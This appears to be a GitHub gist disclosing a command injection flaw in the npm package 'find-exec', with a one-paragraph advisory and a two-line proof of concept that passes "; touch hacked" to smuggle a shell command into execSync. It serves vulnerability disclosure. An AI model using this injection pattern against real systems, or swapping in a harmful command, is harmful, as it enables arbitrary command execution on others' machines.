miguelafmonteiro/find-exec_poc.js

Created July 17, 2023 20:47

Star () You must be signed in to star a gist
Fork () You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/miguelafmonteiro/8a13f49cdc2a7b8af9d39e7e9385623c.js"></script>
Save miguelafmonteiro/8a13f49cdc2a7b8af9d39e7e9385623c to your computer and use it in GitHub Desktop.

Download ZIP

Affected versions of this package are vulnerable to Command Injection as an attacker controlled parameter (index.js#L5) flows into a sensitive command execution API execSync (index.js#L20). As a result, attackers may inject malicious commands.

Raw

find-exec_poc.js

	const findexec = require('find-exec');
	findexec("; touch hacked")

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment